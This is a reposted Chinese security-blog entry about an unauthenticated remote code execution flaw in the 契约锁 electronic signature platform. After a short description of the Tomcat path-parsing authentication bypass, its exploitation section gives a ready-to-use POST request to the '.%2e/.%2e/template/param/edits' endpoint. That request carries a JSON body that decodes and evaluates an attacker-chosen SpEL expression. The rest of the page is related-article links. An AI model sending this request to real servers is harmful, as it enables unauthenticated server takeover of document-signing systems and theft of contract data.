CTF导航 CTF导航

1day | 契约锁电子签章平台edits远程代码执行漏洞

渗透技巧 1周前 admin
8 0 0

漏洞描述

契约锁电子签章平台 /contract/ukeysign/.%2e/.%2e/template/param/edits 接口处存在远程代码执行漏洞,未经身份验证的攻击者可通过tomcat对路径参数解析不正当的特性绕过权限认证在目标执行恶意代码,获取服务器权限。经过分析和研判,该漏洞利用难度低,可导致远程代码执行,建议尽快修复

漏洞利用

POST /contract/ukeysign/.%2e/.%2e/template/param/edits HTTP/1.1 
Host: 
User-Agent:Mozilla/5.0(Macintosh;IntelMacOSX10_15_7) 
AppleWebKit/537.36(KHTML,likeGecko)Chrome/113.0.0.0Safari/537.36 
Content-Type:application/json

{"id":"2","params":[{"expression":"vara=new 
org.springframework.expression.spel.standard.SpelExpressionParser();var 
b='SpEL表达式的base64编码';varb64=java.util.Base64.getDecoder();var
deStr=newjava.lang.String(b64.decode(b),'UTF-8');var 
c=a.parseExpression(deStr);c.getValue();"}]}


原文始发于微信公众号(土拨鼠的安全屋):1day | 契约锁电子签章平台edits远程代码执行漏洞

版权声明:admin 发表于 2024年11月6日 上午8:44。
转载请注明:1day | 契约锁电子签章平台edits远程代码执行漏洞 | CTF导航

相关文章

A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation
admin
633
每周蓝军技术推送(2023.2.4-2.10)
admin
381
【技术分享】我是如何入侵Apple并拿到40万赏金的(二)
admin
558
漏洞复现-RuoYi-若依V4.7.6任意文件下载漏洞
admin
1,537
hw蓝队溯源流程详细介绍
admin
870
Identifying APs With Hidden SSIDs
admin
114

相关文章

Resin URL解析特性导致权限认证绕过分析
0
CVE-2024-4956:Nexus Repository 3目录穿越漏洞
0
原创 Paper | CodeQL 入门和基本使用
0
终于见到了 frida 作者
0
每周蓝军技术推送(2024.11.2-11.8)
0
每日安全动态推送(24/11/8)
0
编写Markdown文章批量上传图片发布到论坛方法
0
CVE-2019-13288漏洞分析
0
Xlight FTP Server整数溢出漏洞(CVE-2024-46483)分析与复现
0
每日安全动态推送(24/11/7)
0